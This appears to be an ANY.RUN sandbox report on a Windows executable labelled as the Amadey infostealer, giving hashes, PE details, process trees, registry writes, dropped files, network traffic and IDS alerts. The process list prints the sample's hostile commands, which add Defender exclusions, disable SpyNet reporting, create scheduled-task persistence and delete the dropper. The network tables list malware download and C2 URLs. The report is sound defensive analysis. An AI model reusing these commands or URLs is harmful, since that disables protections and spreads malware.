| File name: | WWW14_64[1].exe |
| Full analysis: | https://app.any.run/tasks/5b4d5467-f4f9-46da-8c44-82a9dffe4c55 |
| Verdict: | Malicious activity |
| Threats: | Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. |
| Analysis date: | June 19, 2023, 19:06:53 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32+ executable (GUI) x86-64, for MS Windows |
| MD5: | 57494E075F2DB4E3B06F1772A106D1AA |
| SHA1: | A5B116F5801BD1ADAD5ADC4F8DA68AAAAE565C98 |
| SHA256: | 0A0C50DBC5D0C9811BFD0552DDD075E0E1DF2CF07049CC546E41F9BF08CB8290 |
| SSDEEP: | 98304:qoqwCSVZ/CBn6VqfRPsFfk/2LwgJzCpyUmdD3WV6O90dEC6KZ6YolvgFI48gQdz7:hqYVCBn6oJefe2LZzAm66jX/FAgW |
| .exe | | | Win64 Executable (generic) (87.3) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (6.3) |
| .exe | | | DOS Executable Generic (6.3) |
| ProductVersion: | 7.0.45.1145 |
|---|---|
| ProductName: | TCDirectChat |
| ProgramID: | com.embarcadero.TCDirectChat |
| InternalName: | N-able Take Control |
| FileVersion: | 7.0.45.1145 |
| FileDescription: | TCDirectChat |
| CompanyName: | N-able Take Control |
| CharacterSet: | Windows, Latin1 |
| LanguageCode: | English (U.S.) |
| FileSubtype: | - |
| ObjectFileType: | Executable application |
| FileOS: | Win32 |
| FileFlags: | (none) |
| FileFlagsMask: | 0x003f |
| ProductVersionNumber: | 7.0.45.1145 |
| FileVersionNumber: | 7.0.45.1145 |
| Subsystem: | Windows GUI |
| SubsystemVersion: | 6 |
| ImageVersion: | - |
| OSVersion: | 6 |
| EntryPoint: | 0xa6c7a2 |
| UninitializedDataSize: | - |
| InitializedDataSize: | 1209344 |
| CodeSize: | 3128832 |
| LinkerVersion: | 14.29 |
| PEType: | PE32+ |
| ImageFileCharacteristics: | Executable, Large address aware |
| TimeStamp: | 2023:06:12 18:12:38+00:00 |
| MachineType: | AMD AMD64 |
| Architecture: | IMAGE_FILE_MACHINE_AMD64 |
|---|---|
| Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
| Compilation Date: | 12-Jun-2023 18:12:38 |
| Detected languages: |
|
| CompanyName: | N-able Take Control |
| FileDescription: | TCDirectChat |
| FileVersion: | 7.0.45.1145 |
| InternalName: | N-able Take Control |
| ProgramID: | com.embarcadero.TCDirectChat |
| ProductName: | TCDirectChat |
| ProductVersion: | 7.0.45.1145 |
| Magic number: | MZ |
|---|---|
| Bytes on last page of file: | 0x0090 |
| Pages in file: | 0x0003 |
| Relocations: | 0x0000 |
| Size of header: | 0x0004 |
| Min extra paragraphs: | 0x0000 |
| Max extra paragraphs: | 0xFFFF |
| Initial SS value: | 0x0000 |
| Initial SP value: | 0x00B8 |
| Checksum: | 0x0000 |
| Initial IP value: | 0x0000 |
| Initial CS value: | 0x0000 |
| Overlay number: | 0x0000 |
| OEM identifier: | 0x0000 |
| OEM information: | 0x0000 |
| Address of NE header: | 0x00000080 |
| Signature: | PE |
|---|---|
| Machine: | IMAGE_FILE_MACHINE_AMD64 |
| Number of sections: | 10 |
| Time date stamp: | 12-Jun-2023 18:12:38 |
| Pointer to Symbol Table: | 0x00000000 |
| Number of symbols: | 0 |
| Size of Optional Header: | 0x00F0 |
| Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
|---|---|---|---|---|---|
.text | 0x00001000 | 0x002FBCA5 | 0x00000000 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 0 |
.rdata | 0x002FD000 | 0x0003B986 | 0x00000000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 0 |
.data | 0x00339000 | 0x00012490 | 0x00000000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0 |
.pdata | 0x0034C000 | 0x00015000 | 0x00000000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 0 |
_RDATA | 0x00361000 | 0x000000FC | 0x00000000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 0 |
.vmp;""@si3 | 0x00362000 | 0x00336973 | 0x00000000 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 0 |
.vmp;""@ | 0x00699000 | 0x00000C00 | 0x00000C00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 2.73453 |
.vmp;""@t<[ | 0x0069A000 | 0x005B3C74 | 0x005B3E00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_READ | 7.90193 |
.reloc | 0x00C4E000 | 0x000000D0 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 1.96799 |
.rsrc | 0x00C4F000 | 0x0001DFCE | 0x0001E000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 6.39859 |
Title | Entropy | Size | Codepage | Language | Type |
|---|---|---|---|---|---|
1 | 5.27544 | 1838 | UNKNOWN | English - United States | RT_MANIFEST |
2 | 5.01515 | 67624 | UNKNOWN | UNKNOWN | RT_ICON |
3 | 7.97093 | 42579 | UNKNOWN | UNKNOWN | RT_ICON |
ADVAPI32.dll |
KERNEL32.dll |
SHELL32.dll |
USER32.dll |
ole32.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 244 | "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANOtuTxkpyUn" /t REG_DWORD /d 0 /reg:64 | C:\Windows\SysWOW64\reg.exe | — | wscript.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 272 | "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&" | C:\Windows\SysWOW64\forfiles.exe | — | Install.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: ForFiles - Executes a command on selected files Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 276 | "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pHTdmwRwUHPFbNDphBR" /t REG_DWORD /d 0 /reg:64 | C:\Windows\SysWOW64\reg.exe | — | wscript.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 276 | schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\AritgjejU\WtKcLm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "sOtopLRPzdWNzWf" /V1 /F | C:\Windows\SysWOW64\schtasks.exe | — | iQegscw.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 544 | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OtiTFjOPYknRmwVY" /t REG_DWORD /d 0 /reg:64 | C:\Windows\SysWOW64\reg.exe | — | cmd.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 600 | C:\Users\admin\AppData\Roaming\{846ee340-7039-11de-9d20-806e6f6e6963}\lSbth8S3.exe | — | Rec619.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 696 | "C:\Windows\System32\cmd.exe" /c taskkill /im "Rec619.exe" /f & erase "C:\Program Files (x86)\FMOCover\Rec619\Rec619.exe" & exit | C:\Windows\SysWOW64\cmd.exe | — | Rec619.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 712 | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F | C:\Windows\SysWOW64\schtasks.exe | — | oneetx.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 764 | CACLS "oneetx.exe" /P "admin:R" /E | C:\Windows\SysWOW64\cacls.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Control ACLs Program Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 868 | C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\OtiTFjOPYknRmwVY\yShOhVMc\KnFdUxp.dll",#1 /yGsite_idtsz 525403 | C:\Windows\SysWOW64\rundll32.exe | rundll32.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (1960) explorer.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0 |
| Operation: | write | Name: | CheckSetting |
Value: 01000000D08C9DDF0115D1118C7A00C04FC297EB0100000040131FD0E0B45449B5325CF35709B45A0000000002000000000010660000000100002000000097BA847E5D0827CAFBC4D33F7B8AFE8834428DFEF065FA018D8CAB90C5710B0A000000000E8000000002000020000000703BDF28CF4D9DFCAB7DDC229F11B838657F02A563D675B7BA5A582848A73F4F300000008091631BBFD318C1A67DDE62193EF5F65F823DF6F3FB12C344A857963FC714699639A04F9F66927C69CA8E9AC61E02154000000007CED62AF9113E09870DE72EB5744E2CBFDC316C2CF8607885EA5CBB68D61BE0CFB49EE1C4CAF8F2769692B62252F8AB0F88C1F92875F93F72FE70BCC896EFE4 | |||
| (PID) Process: | (3020) WWW14_64[1].exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}User |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3020) WWW14_64[1].exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3020) WWW14_64[1].exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}Machine |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3020) WWW14_64[1].exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}Machine\SOFTWARE |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3020) WWW14_64[1].exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}Machine\SOFTWARE\Policies |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3020) WWW14_64[1].exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}Machine\SOFTWARE\Policies\Microsoft |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3020) WWW14_64[1].exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}Machine\SOFTWARE\Policies\Microsoft\Windows Defender |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3020) WWW14_64[1].exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3020) WWW14_64[1].exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{EF7D318E-A29D-4053-8277-4BCDDA4F3BF4}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions |
| Operation: | delete key | Name: | (default) |
Value: | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3020 | WWW14_64[1].exe | C:\Users\admin\Pictures\Minor Policy\aKcLQTKe7Jo2dXeswsiTr0G9.exe | executable | |
MD5:EE0516A44D6E7CC5E2BEF2CA0E5CF461 | SHA256:8DC7D4261B9EA7463AE129A04C13BEB905D7A5722B03C90EA57E0A81C04F0880 | |||
| 3020 | WWW14_64[1].exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\FUVFAZ8D.txt | text | |
MD5:6F69B0B50D4AB4916DDA0C4572FA7383 | SHA256:AB6F5BBE394BDD3588930931DF2780FB7E206FF6837BCFA4B73E8A8DDC74006F | |||
| 3020 | WWW14_64[1].exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\HCQ3XEP4.txt | text | |
MD5:1918CBAAF0B5103AFE762F8ECECDFB84 | SHA256:80AECA7611E814F90AC4CDCFF66E66F310D73205C537E21EFD0395034BA7B20A | |||
| 3020 | WWW14_64[1].exe | C:\Users\admin\Pictures\Minor Policy\tPUMHyr_GXgsJl0I6eUIRqNU.exe | text | |
MD5:C965AA525AE4CFBC3B45C6B7E9271A59 | SHA256:50EA6C698E72E13B8132B66BBCA9479B7F4815EBB2F8ADB3CA1CFEC79523107E | |||
| 3020 | WWW14_64[1].exe | C:\Users\admin\Pictures\Minor Policy\VbwzlPkCvFcIAjZzVHqES729.exe | html | |
MD5:3188EEDC57A70165D557D4F870241849 | SHA256:4A865B0F86DF77EE960E89F7F36067B452A2CF8DA46604F1ADC712860AFDC638 | |||
| 3020 | WWW14_64[1].exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\2BRTNK78.txt | text | |
MD5:82FE92B83D8E63EBB057F6AF95F4F7BD | SHA256:C5EED7799A1D436524E3C1A130B6134124E135CB8166F5679C98AF506AC1C246 | |||
| 3020 | WWW14_64[1].exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\undoo[1].exe | executable | |
MD5:EE0516A44D6E7CC5E2BEF2CA0E5CF461 | SHA256:8DC7D4261B9EA7463AE129A04C13BEB905D7A5722B03C90EA57E0A81C04F0880 | |||
| 3020 | WWW14_64[1].exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\J6NZK6W7.txt | text | |
MD5:A7259ED5DD7FE2C805953BBF947D2539 | SHA256:028609E6C3F362653E537B6AB3738D02DBA1272EADF9F94308A066824FCBCE6C | |||
| 3020 | WWW14_64[1].exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\setup_1[1].bmp | — | |
MD5:— | SHA256:— | |||
| 3020 | WWW14_64[1].exe | C:\Users\admin\Pictures\Minor Policy\IZfNITzXXVGKJ4hJs21Ql_MK.exe | — | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3020 | WWW14_64[1].exe | HEAD | — | 45.9.74.80:80 | http://45.9.74.80/undoo.exe | SC | — | — | malicious |
3020 | WWW14_64[1].exe | HEAD | 404 | 94.156.35.76:80 | http://230617061101912.und.anx63.shop/f/fsbm0617.exe | CY | — | — | suspicious |
3020 | WWW14_64[1].exe | HEAD | 200 | 45.12.253.74:80 | http://45.12.253.74/pineapple.php?pub=mixinte | BG | — | — | malicious |
3020 | WWW14_64[1].exe | GET | — | 188.114.97.3:80 | http://ji.jahhaega2qq.com/m/p0aw25.exe | US | — | — | malicious |
2024 | xYnUz2QC_ocIkOYsP8huHqbV.exe | GET | 301 | 104.17.214.67:80 | http://www.maxmind.com/geoip/v2.1/city/me | US | — | — | whitelisted |
3020 | WWW14_64[1].exe | POST | 200 | 208.67.104.60:80 | http://208.67.104.60/api/firegate.php | US | text | 108 b | malicious |
3020 | WWW14_64[1].exe | GET | 404 | 94.156.35.76:80 | http://230617061101912.und.anx63.shop/f/fsbm0617.exe | CY | text | 17 b | suspicious |
3020 | WWW14_64[1].exe | GET | 301 | 141.95.126.89:80 | http://red.mk/netTime.exe | FR | html | 707 b | suspicious |
3020 | WWW14_64[1].exe | GET | 200 | 45.12.253.74:80 | http://45.12.253.74/pineapple.php?pub=mixinte | BG | executable | 3.04 Mb | malicious |
1252 | Y2HOjH0snBs3RXz7lVECiUxD.exe | GET | 200 | 39.109.117.57:80 | http://as.imgjeoigaa.com/check/safe | HK | text | 96 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3020 | WWW14_64[1].exe | 87.240.132.72:80 | vk.com | VKontakte Ltd | RU | suspicious |
3020 | WWW14_64[1].exe | 87.240.132.78:80 | vk.com | VKontakte Ltd | RU | suspicious |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
328 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
3020 | WWW14_64[1].exe | 208.67.104.60:80 | — | Delis LLC | US | malicious |
3020 | WWW14_64[1].exe | 104.26.9.59:443 | api.myip.com | CLOUDFLARENET | US | suspicious |
3020 | WWW14_64[1].exe | 34.117.59.81:443 | ipinfo.io | GOOGLE-CLOUD-PLATFORM | US | whitelisted |
3020 | WWW14_64[1].exe | 87.240.137.164:80 | vk.com | VKontakte Ltd | RU | suspicious |
3020 | WWW14_64[1].exe | 93.186.225.194:443 | vk.com | VKontakte Ltd | RU | suspicious |
3020 | WWW14_64[1].exe | 93.186.225.194:80 | vk.com | VKontakte Ltd | RU | suspicious |
Domain | IP | Reputation |
|---|---|---|
api.myip.com |
| suspicious |
ipinfo.io |
| shared |
vk.com |
| whitelisted |
teredo.ipv6.microsoft.com |
| whitelisted |
dns.msftncsi.com |
| shared |
red.mk |
| suspicious |
ji.jahhaega2qq.com |
| malicious |
sergejbukotko.com |
| unknown |
filetops.com |
| malicious |
230617061101912.und.anx63.shop |
| suspicious |
PID | Process | Class | Message |
|---|---|---|---|
3020 | WWW14_64[1].exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 39 |
3020 | WWW14_64[1].exe | Device Retrieving External IP Address Detected | ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com) |
3020 | WWW14_64[1].exe | Malware Command and Control Activity Detected | ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET) |
3020 | WWW14_64[1].exe | Device Retrieving External IP Address Detected | ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) |
3020 | WWW14_64[1].exe | Generic Protocol Command Decode | SURICATA Applayer Mismatch protocol both directions |
3020 | WWW14_64[1].exe | Generic Protocol Command Decode | SURICATA Applayer Mismatch protocol both directions |
3020 | WWW14_64[1].exe | Generic Protocol Command Decode | SURICATA Applayer Mismatch protocol both directions |
3020 | WWW14_64[1].exe | Generic Protocol Command Decode | SURICATA Applayer Mismatch protocol both directions |
3020 | WWW14_64[1].exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
3020 | WWW14_64[1].exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |